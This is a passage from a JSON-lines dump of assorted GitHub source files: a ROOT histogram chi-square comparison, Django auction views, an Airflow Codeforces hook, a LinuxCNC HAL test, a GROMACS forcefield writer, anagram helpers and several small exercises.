name of the hist file as part of the path\n try:\n f_path_th1 = f_path + '/' + input.GetName() \n except:\n print(\"can't get f_path_th1\")\n\n # Format f_path_th1\n try:\n # Get the part of f_path that follows the ':'\n f_path_th1 = f_path_th1.split(':')\n f_path_th1 = f_path_th1[1][1:]\n except:\n print(\"can't format f_path_th1\")\n\n # Calculate the chi2 values and store them in chi2_dict \n try:\n # Calculate the chi2 value between file1's and file2's filename:f_name\n chi2ndf_val = file1.Get(f_path_th1).Chi2Test(file2.Get(f_path_th1),'CHI2/NDF')\n chi2_dict['f_name'].append(f_path_th1)\n chi2_dict['f_type'].append('TH1')\n chi2_dict['chi2ndf_vals'].append(chi2ndf_val)\n except: \n errors +=1\n print(f'chi2 error on filepath: {f_path_th1}')\n \n\n return f_path, chi2_dict, n_th1, n_th2,n_tp, errors\n\n#####################\n# The Main Function #\n#####################\n\ndef chi2df():\n\n try:\n with open('/app/data/fileOne.txt', 'r') as f:\n for line in f.readlines():\n if '' not in line or ' ' not in line or '\\n' not in line:\n file1 = ROOT.TFile.Open(\"/app/data/\" + line)\n # file1 = ROOT.TFile.Open(line)\n except:\n print('file1 sucks')\n file1 = ROOT.TFile('/app/data/fileOneError.root','RECREATE')\n\n print('FILE1:',file1)\n\n 
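# Mirror the fileOne.txt handling for the second input: read the second ROOT file\n # name from fileTwo.txt and, on any failure, fall back to an empty placeholder\n # file so the chi2 comparison degrades gracefully instead of crashing.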
try:\n with open('/app/data/fileTwo.txt', 'r') as f:\n for line in f.readlines():\n if '' not in line or ' ' not in line or '\\n' not in line:\n file2 = ROOT.TFile.Open(\"/app/data/\" + line)\n # file2 = ROOT.TFile.Open(line)\n except:\n print('file2 sucks')\n file2 = ROOT.TFile.Open('/app/data/fileTwoError.root','RECREATE')\n \n print('FILE2:',file2)\n\n # To silence the chi2 errors, use the following\n # ROOT.gSystem.RedirectOutput(\"/dev/null\")\n\n # Calculate the chi2 values and other relevant information for the comparison\n f_path, chi2_dict,n_th1,n_th2,n_tp,errors = validate_uw_hists(file1, file1,file2,'',{'f_name':[],'f_type':[],'chi2ndf_vals':[]},0,0,0,0)\n\n # Construct the dataframe\n df = pd.DataFrame(chi2_dict)\n \n print('processing complete..')\n\n return df, errors\n","repo_name":"CaryRandazzo/ATLAScollab","sub_path":"AtlasValidationDashboard/dashboard/src/chi2.py","file_name":"chi2.py","file_ext":"py","file_size_in_byte":8413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36462381499","text":"def lambda_handler(event, context):\n input = event['queryStringParameters']['input']\n scammer = Scammer()\n scammer_response = scammer.get_scam_message(input)\n \n return {\n 'statusCode': 200,\n 'body': scammer_response\n }\n\n\nclass Scammer:\n\n SCAM_TEMPLATE = \"Hello, you just won 1.000.000$ for being the 1000th person to write: {}. Claim your prize today!'\"\n\n def get_scam_message(self, input):\n return self.SCAM_TEMPLATE.format(input)","repo_name":"valeri0/lambda-rest-api","sub_path":"lambda/src/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"19320980511","text":"from F14 import save\n\ndef ext():\n # SPESIFIKASI\n # Memberi pilihan menyimpan program sebelum program diakhiri\n\n # KAMUS\n # YorN : char\n\n # ALGORITMA\n while True: # While loop tidak akan berhenti hingga input user valid\n YorN = input('Apakah Anda mau melakukan penyimpanan file yang sudah diubah? 
(y/n) ')\n if YorN == 'Y' or YorN == 'y':\n # Akan dilakukan penyimpanan data dengan menjalankan prosedut save\n save()\n break\n elif YorN == 'N' or YorN =='n':\n break\n else:\n print('Masukan tidak valid')","repo_name":"Hifzd/Final-Tubes-Daspro","sub_path":"New/F16.py","file_name":"F16.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1295788288","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\n\nfrom urllib.parse import urlparse\nimport os.path\n\nfrom .models import *\nfrom .forms import *\n\ndef index(request):\n return render(request, \"auctions/index.html\",{\n 'listing_pages': Listing.objects.filter(active=True).order_by('-id')\n })\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"auctions/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/register.html\")\n\n@login_required\ndef create_listing(request):\n \n if request.method == 'POST':\n new_listing = ListingForm(request.POST, request.FILES)\n\n if new_listing.is_valid():\n j = new_listing.save(commit=False)\n j.user = request.user\n j.save()\n return render(request, \"auctions/index.html\",{\n 'listing_pages': Listing.objects.filter(active=True).order_by('-id')\n })\n \n else:\n return render(request, \"auctions/create_listing.html\", {\n \"form\": ListingForm()\n })\n\n@login_required\ndef view_listing(request, listing_id):\n \n page = {\n 'listing' : Listing.objects.get(id=listing_id),\n 'comments' : Comment.objects.all().filter(listing_id=listing_id),\n 'in_watchlist' : Watchlist.objects.all().filter(listing__id=listing_id, user__id=request.user.id),\n 'new_bid': BidForm(),\n 'new_comment' : CommentForm(),\n }\n \n if request.method == 'POST':\n if request.POST.get('form_type') == 'post_comment':\n new_comment = CommentForm(request.POST)\n\n if new_comment.is_valid():\n j = new_comment.save(commit=False)\n j.user = request.user\n j.listing = Listing.objects.get(id=listing_id)\n j.save()\n \n 
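# Django querysets are lazy, so page['comments'] is only evaluated when the\n # template renders; the comment saved just above is therefore included in\n # the response without rebuilding the context dict.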
return render(request, 'auctions/view_listing.html', page)\n\n elif request.POST.get('form_type') == 'post_bid':\n new_bid = BidForm(request.POST)\n if new_bid.is_valid():\n old_bid = new_bid.cleaned_data.get('value')\n\n try:\n highest_bid = Listing.objects.get(id=listing_id).bids.last().value\n except: \n highest_bid = 0\n\n if highest_bid >= old_bid or old_bid <= Listing.objects.get(id=listing_id).price:\n page['new_bid'] = new_bid\n new_bid.add_error('value', 'bid is not high enough')\n \n return render(request, 'auctions/view_listing.html', page)\n\n mod_listing = Listing.objects.get(id=listing_id)\n add_bid = Bid(user=request.user, value=old_bid)\n add_bid.save()\n mod_listing.bids.add(add_bid)\n \n return render(request, 'auctions/view_listing.html', page)\n\n else:\n return render(request, 'auctions/view_listing.html', page)\n\n@login_required\ndef finish_listing(request, listing_id):\n\n if Listing.objects.get(id=listing_id).user != request.user:\n return render(request, 'auctions/index.html')\n else:\n listing_to_finish = Listing.objects.get(id=listing_id) \n listing_to_finish.active = False\n listing_to_finish.save()\n return redirect(request.META['HTTP_REFERER'])\n\n@login_required\ndef in_watchlist(request, listing_id):\n \n on_watch = Watchlist.objects.all().filter(\n listing__id = listing_id, \n user__id = request.user.id\n )\n\n if on_watch:\n on_watch.delete()\n else:\n new_watchlist = Watchlist(\n listing=Listing.objects.get(id=listing_id), \n user=request.user\n )\n new_watchlist.save() \n\n if os.path.split(urlparse(request.META['HTTP_REFERER']).path)[1] != 'watchlist':\n return redirect(request.META['HTTP_REFERER'])\n else:\n return render(request, 'auctions/my_watchlist.html')\n \n\n@login_required\ndef my_watchlist(request):\n\n return render(request, 'auctions/my_watchlist.html', {\n 'watchlist': Watchlist.objects.filter(user=request.user).order_by('-id')\n })\n\n@login_required\ndef my_listings(request):\n \n return render(request, 'auctions/my_listings.html', {\n 'my_listings': Listing.objects.filter(user=request.user).order_by('-id')\n })\n\n@login_required\ndef view_categories(request):\n\n return render(request, 'auctions/list_categories.html', {\n 'list_categories': Category.objects.all()\n })\n\n@login_required\ndef view_category(request, category_id):\n\n return render(request, 'auctions/view_category.html', {\n 'cat_listings': Listing.objects.filter(category=category_id).order_by('-id')\n })","repo_name":"robsonvpires/ecommerce","sub_path":"auctions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"8543683882","text":"# function for 'channel_messages', allowing users to view up to last 50 messages in a channel\n\nfrom server.general import AccessError, ValueError, decode_token, valid_channel_id, num_channel_messages, id_to_channel, user_in_channel, is_reacted, id_to_message, authorise_token\n\n@authorise_token\ndef channel_messages(token, channel_id, start):\n # channel does not exit or start > total number of messages\n if not valid_channel_id(channel_id):\n raise ValueError(description=\"Channel does not exist \")\n # user is not part of the channel\n elif not user_in_channel(decode_token(token), channel_id):\n raise AccessError(description=\"User is not a member of the channel\")\n \n u_id = decode_token(token)\n channel = id_to_channel(channel_id)\n\n # start is greater than the number of messages in the channel \n if 
start > num_channel_messages(channel_id):\n raise ValueError(description=\"No more messages left in the channel\")\n\n channel_message = {\n 'messages': [], \n 'start': 0, \n 'end': 0 \n }\n\n # intialises the values of channel_messages \n channel_message['start'] = start\n count = 0 \n message_list = channel['messages'][::-1]\n\n # loops through the reverse chronological messages and adds them to the list \n for message in message_list: \n # message is removed so will ignore it \n if message['is_removed']:\n continue\n\n # ONLY VALID REACT_ID IS 1 (AS THE SPEC SAYS)\n if not is_reacted(u_id, message['message_id'], 1):\n message['reacts'][0]['is_this_user_reacted'] = False\n data_msg = id_to_message(message['message_id'])\n data_msg['reacts'][0]['is_this_user_reacted'] = False\n\n if count < start + 50 and count >= start and not message['is_removed']: \n channel_message['messages'].append(message) \n \n count = count + 1 \n\n # less than 50 messages have been returned \n if len(channel_message['messages']) != 50:\n channel_message['end'] = -1 \n else: \n channel_message['end'] = start + 50 \n\n return channel_message\n","repo_name":"kevywevyy/Slack","sub_path":"server/channel_messages.py","file_name":"channel_messages.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"4138203562","text":"import time as t\nimport matplotlib.pyplot as plt\n# mass, velocity, accln, disp, time\n# interaction force every loop\n# inputs --> thrust increments -> new_accl, and continous parameters\n# some step function --> steps through iterations\n\ntime = 0\n\nclass Spacecraft:\n\tdef __init__(self, name, mass, velocity, accln, x_pos):\n\t\tself.name = name\n\t\tself.mass = mass\n\t\tself.velocity = velocity\n\t\tself.accln = accln\n\t\tself.x_pos = x_pos\n\n\tdef step_Function(self):\n\t\tglobal time\n\t\t# MASS CONSTANT\n\t\ttime_step = 0.01 \n\t\ttime += time_step\n\t\tself.x_pos += self.velocity * time_step\n\t\tself.velocity += self.accln * time_step\n\t\tself.accln += time ** 2\n\n\t\t\t\t\t\t\n\tdef display_Status(self):\n\t\tglobal time\n\t\tprint(\"TIME -->\", time)\n\t\tprint(\"CRAFT -->\", self.name)\n\t\tprint(\"MASS --> \", self.mass)\n\t\tprint(\"VELOCITY --> \", self.velocity)\n\t\tprint(\"ACCLRTION--> \", self.accln)\n\t\tprint(\"POSITION --> \", self.x_pos)\n\t\tprint(\"\\n\")\t\n\nchaser = Spacecraft(\"CHASER\", 100, 10, 2, 0)\n\nx_list = []\nt_list = []\n\nfor i in range(0, 1000):\n\tchaser.display_Status()\n\tchaser.step_Function()\n\t\n\tx_list.append(chaser.x_pos)\n\tt_list.append(time)\n\nplt.plot(t_list, x_list)\nplt.show()","repo_name":"vimanyuveer/2D-Differential-Sim","sub_path":"Docking_Sim.py","file_name":"Docking_Sim.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"40217083555","text":"from airflow.hooks.http_hook import HttpHook\n\nimport requests\nimport json\n\nclass CfApiHook(HttpHook):\n\n def __init__(self, query, conn_id = None):\n self.query = query\n self.conn_id = conn_id or \"cf_api\"\n super().__init__(http_conn_id=self.conn_id)\n\n\n def create_url(self, **kwargs):\n query = self.query\n url = f\"{self.base_url}/{query}?\"\n for k, arg in kwargs.items():\n url += f\"{k}={arg}&\"\n return url[:-1]\n\n\n def connect_to_endpoint(self, url, session):\n response = requests.Request(\"GET\", url)\n prep = session.prepare_request(response)\n self.log.info(f\"URL: 
{url}\")\n return self.run_and_check(session, prep, {}).json()\n\n\n def run(self):\n session = self.get_conn()\n url = self.create_url()\n return self.connect_to_endpoint(url, session)\n\n\nif __name__ == \"__main__\":\n print(json.dumps(CfApiHook(\"contest.list?gym=true\").run(), indent=4,sort_keys=True))","repo_name":"RafaelGranza/CodeForces-ETL","sub_path":"airflow/plugins/hooks/cf_api_hook.py","file_name":"cf_api_hook.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72307869018","text":"import math\n\n\nclass TasksAllocator:\n\n def __init__(self, tasks, n_intervals, n_cloud_nodes):\n '''\n :param tasks: obiekty zadań\n :param n_intervals: ile przedziałów\n :param intervals: lista przedziałów (górne granice)\n :param shards\n :param shard_load_vect: słownik shard:wektor\n :param summed_vects: słownik shard:miara miejska dla wektora\n :param wts\n :param n_cloud_nodes: ile węzłów chmury\n :param norm_wts\n '''\n\n self.tasks = tasks\n self.n_intervals = n_intervals\n self.intervals = None\n self.shards = []\n self.shard_load_vect = None\n self.summed_vects = {}\n self.wts = []\n self.n_cloud_nodes = n_cloud_nodes\n self.norm_wts = None\n\n def find_shards_load_vectors(self):\n self.tasks.sort(key=lambda task: task.TS+task.length, reverse=False)\n #delta - szerokość naszych przedziałów, co ile kolejny przedział\n delta = math.ceil((self.tasks[-1].TS+self.tasks[-1].length) / self.n_intervals)\n self.intervals = [*range(delta, math.ceil(self.tasks[-1].TS+self.tasks[-1].length)+delta, delta)]\n #print(self.intervals)\n shards = set()\n for task in self.tasks:\n shards.add(task.shard)\n self.shards = sorted(list(shards))\n\n\n #słownik, klucz szard : wartość wektor obciążeń\n intervals = [[0 for _ in range(len(self.intervals))] for _ in range(len(self.shards))]\n\n for task in self.tasks:\n mapped_shard = self.shards.index(task.shard)\n first_interval = math.floor(task.TS/delta)\n last_interval = math.ceil((task.TS + task.length)/delta - 1)\n # jeżeli długość zadania mieści się w przedziale\n if first_interval == last_interval:\n intervals[mapped_shard][first_interval] += (task.length/delta)\n # jeżeli długość się nie mieści\n else:\n # część w pierwszym przedziale\n part_inside_first_interval = self.intervals[first_interval] - task.TS\n intervals[mapped_shard][first_interval] += part_inside_first_interval / delta\n # pełne przedziały\n for i in range(first_interval+1, last_interval, 1):\n # print(f\"pełny przedział w {task = }\")\n intervals[mapped_shard][i] = 1\n # część w ostatnim przedziale\n part_inside_last_interval = (task.TS+task.length) - self.intervals[last_interval-1]\n intervals[mapped_shard][last_interval] += part_inside_last_interval / delta\n\n self.shards_load_vect = dict(zip(self.shards, intervals))\n #print(\"WEKTORY OBCIĄŻEŃ W SŁOWNIKU\")\n #print(self.shards_load_vect)\n\n def find_wts(self):\n #changed to summing in intervals, return vector\n self.wts = [0] * (len(self.intervals))\n #print(self.wts)\n for v in self.shards_load_vect.values():\n for i in range(len(v)):\n self.wts[i] += v[i]\n #print(\"WTS\")\n #print(self.wts)\n\n def find_norm_wts(self):\n self.norm_wts = [0] * (len(self.intervals))\n for i in range(len(self.wts)):\n self.norm_wts[i] = 1/self.n_cloud_nodes*self.wts[i]\n #print(\"NORM WTS\")\n 
#print(self.norm_wts)\n","repo_name":"RobertDudek/shard-allocation-testing","sub_path":"TasksAllocator.py","file_name":"TasksAllocator.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35012517228","text":"#using Backtracking\ndef helper(path,k,start,target):\n if(k==0 and target==0):\n lst.append(path)\n print(path)\n return\n elif(k==0 or target<=0):\n #print(path)\n return\n for i in range(start,10):\n #print(\"I am here\")\n helper(path+[i],k-1,i+1,target-i)\nif __name__==\"__main__\":\n k=3\n target=9\n start=1\n path=[]\n lst=[]\n helper(path,k,start,target)\n print(lst)\n","repo_name":"P-Raj27/MY-DSA-PRACTICE","sub_path":"Sum of K Single Digit Elements_PR.py","file_name":"Sum of K Single Digit Elements_PR.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"31614893828","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport hal\n\ndef cmd(arg):\n subprocess.call(arg, shell=True)\n\nh = hal.component(\"linktest\")\nh.newpin(\"in\", hal.HAL_FLOAT, hal.HAL_IN)\nh.newpin(\"inout\", hal.HAL_FLOAT, hal.HAL_IO)\nh.ready()\n\n# set pin values before linking\nh['in'] = 42\nh['inout'] = 43\nassert h['in'] == 42\nassert h['inout'] == 43\n\n# make sure halcmd setp works as expected\ncmd(\"halcmd setp linktest.in 4712\")\ncmd(\"halcmd setp linktest.inout 4713\")\nassert h['in'] == 4712\nassert h['inout'] == 4713\n\n# create virgin signals\ncmd(\"halcmd newsig insig float\")\ncmd(\"halcmd newsig inoutsig float\")\n\n# link to them\ncmd(\"halcmd net insig linktest.in\")\ncmd(\"halcmd net inoutsig linktest.inout\")\n\n# verify the link did not destroy the pin values\nassert h['in'] == 4712\nassert h['inout'] == 4713\n\n# now change the pin values\nh['in'] = 815\nh['inout'] = 816\n\n# unlink the pins\ncmd(\"halcmd unlinkp linktest.in\")\ncmd(\"halcmd unlinkp linktest.inout\")\n\n# verify the unlink did not destroy the pin values\n# but are as inherited from the signal:\nassert h['in'] == 815\nassert h['inout'] == 816\n\n# the signals should be unlinked\n#cmd(\"halcmd show\")\n","repo_name":"LinuxCNC/linuxcnc","sub_path":"tests/hal-link-unlink/hallink.py","file_name":"hallink.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":1555,"dataset":"github-code","pt":"68"} +{"seq_id":"40725579509","text":"import datetime\r\n\r\ndef meetup_day(myear, mmonth, mday, mday2):\r\n mdayint = 0\r\n mday2int = 0\r\n \r\n mday_dict = {'Monday':0,'Tuesday':1,'Wednesday':2,'Thursday':3,'Friday':4,'Saturday':5,'Sunday':6}\r\n mdayint = mday_dict.get(mday)\r\n \r\n mday2_dict = {'1st':0,'2nd':1,'3rd':2,'4th':3,'last':-1,'teenth':5}\r\n mday2int = mday2_dict.get(mday2)\r\n \r\n dt = datetime.date(myear,mmonth,1)\r\n dow_lst = []\r\n while dt.weekday() != mdayint:\r\n dt = dt + datetime.timedelta(days=1)\r\n while dt.month == mmonth:\r\n dow_lst.append(dt)\r\n dt = dt + datetime.timedelta(days=7)\r\n if mday2int < 4:\r\n return dow_lst[mday2int] # may raise an exception if slicing is wrong\r\n elif mday2int > 4:\r\n for choice in dow_lst:\r\n if (choice.day >= 13 and choice.day <= 19):\r\n return 
choice\n","repo_name":"itsolutionscorp/AutoStyle-Clustering","sub_path":"all_data/exercism_data/python/meetup/94fd87afe2e546918bace71269d71969.py","file_name":"94fd87afe2e546918bace71269d71969.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"5840965562","text":"\"\"\"\nThis module contains a single class ForceField used to output a GROMACS .ff forcefield.\n\"\"\"\n\nimport os\nimport pathlib\nimport shutil\nimport typing\n\nfrom .parsers import CFG\nfrom .util import any_starts_with, backup_file, file_write_lines\n\nPathLike = typing.Union[pathlib.Path, str]\n\n\ndef copy_files(\n src_dir: pathlib.Path, dest_dir: pathlib.Path, files: typing.Iterable[str]\n) -> None:\n \"\"\"Copy files from one directory to another.\"\"\"\n for f in files:\n src_path = src_dir.joinpath(f)\n dest_path = dest_dir.joinpath(f)\n shutil.copyfile(str(src_path), str(dest_path))\n\n\nclass ForceField:\n \"\"\"\n Class used to output a GROMACS .ff forcefield\n \"\"\"\n\n def __init__(self, name: str, dir_path: PathLike = pathlib.Path(\".\")):\n \"\"\"\n Open a named forcefield directory. If it does not exist it is created.\n\n :param str name: Forcefield name to open/create\n \"\"\"\n self.directory = pathlib.Path(dir_path).joinpath(f\"ff{name}.ff\")\n backup_file(self.directory)\n self.directory.mkdir(parents=True, exist_ok=True)\n\n with open(self.directory.joinpath(\"forcefield.itp\"), \"w\") as itp:\n print(f\"#define _FF_PYCGTOOL_{name}\", file=itp)\n print('#include \"martini_v2.2.itp\"', file=itp)\n\n data_dir = pathlib.Path(__file__).parent.joinpath(\"data\")\n\n # Copy MARTINI files\n copy_files(\n data_dir,\n self.directory,\n [\n \"martini_v2.2.itp\",\n \"watermodels.dat\",\n \"w.itp\",\n ],\n )\n\n # Create atomtypes.atp required for correct masses with pdb2gmx\n atomtypes_atp = os.path.join(self.directory, \"atomtypes.atp\")\n with CFG(data_dir.joinpath(\"martini_v2.2.itp\")) as itp, open(\n atomtypes_atp, \"w\"\n ) as atomtypes:\n for toks in itp[\"atomtypes\"]:\n print(\" \".join(toks), file=atomtypes)\n\n with open(self.directory.joinpath(\"forcefield.doc\"), \"w\") as doc:\n print(f\"PyCGTOOL produced MARTINI force field - {name}\", file=doc)\n\n def write(self, filename: str, mapping, bonds):\n \"\"\"\n Write RTP and R2B files for this forcefield.\n\n :param str filename: Filename prefix to use for both files\n :param Mapping mapping: CG Mapping object\n :param Iterable[Bond] bonds: CG Bonds object\n \"\"\"\n lines, nterms, cterms = ForceField.write_rtp(mapping, bonds)\n file_write_lines(self.directory.joinpath(f\"{filename}.rtp\"), lines)\n\n lines = ForceField.write_r2b(nterms, cterms)\n file_write_lines(self.directory.joinpath(f\"{filename}.r2b\"), lines)\n\n @staticmethod\n def bond_section(bonds, section_header, multiplicity=None):\n \"\"\"\n Populate an RTP bond/angle/dihedral section.\n\n :param iterable[Bond] bonds: Iterable of bonds to add to RTP\n :param str section_header: RTP section header i.e. 
\"bonds\"/\"angles\"/\"dihedrals\"\n :param int multiplicity: Multiplicity of dihedral, default is None\n :return List[str]: Lines to add to RTP file\n \"\"\"\n ret_lines = []\n if bonds:\n ret_lines.append(\" [ {0:s} ]\".format(section_header))\n for bond in bonds:\n line = \" \" + \" \".join([\"{0:>4s}\".format(atom) for atom in bond.atoms])\n line += \" {0:12.5f} {1:12.5f}\".format(bond.eqm, bond.fconst)\n if multiplicity is not None:\n line += \" {0:4d}\".format(multiplicity)\n ret_lines.append(line)\n return ret_lines\n\n @staticmethod\n def needs_terminal_entries(mol_name, bondset):\n bonds = bondset.get_bonds(mol_name, natoms=-1)\n return any_starts_with(bonds, \"-\"), any_starts_with(bonds, \"+\")\n\n @staticmethod\n def write_rtp(mapping, bonds):\n \"\"\"\n Return lines of a GROMACS RTP file.\n\n This file defines the residues present in the forcefield and allows pdb2gmx to be used.\n\n :param Mapping mapping: AA->CG mapping from which to collect molecules\n :param BondSet bonds: BondSet from which to collect bonds\n :return (list[str], set[str], set[str], set[str]):\n List of lines for RTP file,\n Set of residues requiring N terminal records,\n Set of residues requiring C terminal records,\n \"\"\"\n\n def write_residue(mol_name, mol_mapping, strip=None, prepend=\"\"):\n ret_lines = [\"[ {0} ]\".format(prepend + mol_name), \" [ atoms ]\"]\n\n for bead in mol_mapping:\n # name type charge chg-group\n ret_lines.append(\n \" {:>4s} {:>4s} {:3.6f} {:4d}\".format(\n bead.name, bead.type, bead.charge, 0\n )\n )\n\n for natoms, (section, multiplicity) in enumerate(\n ((\"bonds\", None), (\"angles\", None), (\"dihedrals\", 1)), start=2\n ):\n if strip is None:\n bond_list = bonds.get_bonds(mol_name, natoms)\n else:\n bond_list = bonds.get_bonds(\n mol_name,\n natoms,\n select=lambda bond: not any_starts_with(bond, strip),\n )\n\n ret_lines.extend(\n ForceField.bond_section(bond_list, section, multiplicity)\n )\n\n return ret_lines\n\n n_terms = set()\n c_terms = set()\n\n rtp_lines = [\"[ bondedtypes ]\", (\"{:4d}\" * 8).format(1, 1, 1, 1, 1, 1, 0, 0)]\n\n for mol_name, mol_mapping in mapping.items():\n try:\n rtp_lines.extend(write_residue(mol_name, mol_mapping))\n except KeyError:\n continue\n\n needs_terminal_entry = ForceField.needs_terminal_entries(mol_name, bonds)\n\n if needs_terminal_entry[0]:\n rtp_lines.extend(\n write_residue(mol_name, mol_mapping, strip=\"-\", prepend=\"N\")\n )\n n_terms.add(mol_name)\n\n if needs_terminal_entry[1]:\n rtp_lines.extend(\n write_residue(mol_name, mol_mapping, strip=\"+\", prepend=\"C\")\n )\n c_terms.add(mol_name)\n if needs_terminal_entry[0]:\n rtp_lines.extend(\n write_residue(\n mol_name, mol_mapping, strip=(\"-\", \"+\"), prepend=\"2\"\n )\n )\n\n return rtp_lines, n_terms, c_terms\n\n @staticmethod\n def write_r2b(n_terms, c_terms):\n \"\"\"\n Return lines of a GROMACS R2B file.\n\n This file defines names used for chain terminal records for PDB2GMX.\n\n :param Iterable[str] n_terms: Set of molecule names requiring N terminal records\n :param Iterable[str] c_terms: Set of molecule names requiring C terminal records\n :return List[str]: Lines of R2B file\n \"\"\"\n ret_lines = [\n \"; rtp residue to rtp building block table\",\n \"; main N-ter C-ter 2-ter\",\n ]\n\n for resname in sorted(n_terms | c_terms):\n nter_str = (\"N\" + resname) if resname in n_terms else \"-\"\n cter_str = (\"C\" + resname) if resname in c_terms else \"-\"\n both_ter_str = (\"2\" + resname) if resname in (n_terms & c_terms) else \"-\"\n ret_lines.append(\n 
\"{0:5s} {0:5s} {1:5s} {2:5s} {3:5s}\".format(\n resname, nter_str, cter_str, both_ter_str\n )\n )\n\n return ret_lines\n","repo_name":"jag1g13/pycgtool","sub_path":"pycgtool/forcefield.py","file_name":"forcefield.py","file_ext":"py","file_size_in_byte":7663,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"68"} +{"seq_id":"36742518158","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom rest_framework import serializers\n\n\nclass HasPosition:\n def __init__(self, queryset, field):\n self.queryset = queryset\n self.field = field\n\n def __call__(self, value):\n query_filter = {self.field: value}\n try:\n self.queryset.get(**query_filter)\n except ObjectDoesNotExist:\n message = 'There is no such this position'\n raise serializers.ValidationError(message)\n","repo_name":"akademik2607/simpleshop","sub_path":"cart/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24190908159","text":"\"\"\"\nHelper functions for help with the extension.\n 1 > make_dict(word_list: str): Make the word_dict.pickle file.\n Wordlist used can be changed by changing the value of the variable WORD_LIST.\n 2 > get_anagram_hub_id(api_url: str, auth_header: dict) -> int:\n Return the seesion_id for anagram game hub.\n 3 > get_questions(api_url: str, auth_header: dict, hub_id: int):\n Generator function that looks for messages that contain a new anagram word\n and yield them without spaces and lowercased.\n Note: It is possible that some messages be skipped from in between.\n 4 > run_as_main: Call make_dict\n\"\"\"\n\nfrom collections import namedtuple, Counter\nimport pickle\nimport re\nimport requests\n\nWORD_LIST = \"wordlist.txt\"\n\n\ndef get_anagram_hub_id(api_url: str, auth_header: dict) -> int:\n \"\"\"Return the seesion_id for anagram game hub.\"\"\"\n hubs = requests.get(f\"http://{api_url}hubs\", headers=auth_header).json()\n for hub in hubs:\n if hub[\"identity\"][\"name\"] == \"Anagram Game Hub\":\n return hub[\"id\"]\n\n\ndef get_questions(api_url: str, auth_header: dict, hub_id: int):\n \"\"\"\n Generator function that looks for messages that contain a new anagram word\n and yield them without spaces and lowercased.\n Note: It is possible that some messages be skipped from in between.\n \"\"\"\n QUESTION_REGEX = re.compile(r\"\\*\\*\\* New Anagram Word is \\[ (?P(\\w\\s)+)\")\n latest_message_id = 0\n while True:\n messages = requests.get(\n f\"http://{api_url}hubs/{hub_id}/messages/5\", headers=auth_header\n ).json()\n for message in messages:\n if \"chat_message\" not in message:\n continue\n if message[\"chat_message\"][\"id\"] <= latest_message_id:\n continue\n latest_message_id = message[\"chat_message\"][\"id\"]\n match = re.search(QUESTION_REGEX, message[\"chat_message\"][\"text\"])\n if match:\n letters = match.group(\"letters\")\n yield letters.lower().replace(\" \", \"\")\n\n\ndef make_dict(word_list: str) -> None:\n \"\"\"\n Open word_list and create/overwite word_dict.pickle with the contents of processed list.\n \"\"\"\n word_dict = {}\n with open(word_list) as f:\n for word in f:\n word = word.strip()\n word_key = \"\".join(sorted(word))\n try:\n word_dict[word_key].append(word)\n except KeyError:\n word_dict[word_key] = [word]\n\n with open(\"word_dict.pickle\", \"bw+\") as f:\n pickle.dump(word_dict, f)\n\n\nif __name__ == \"__main__\":\n 
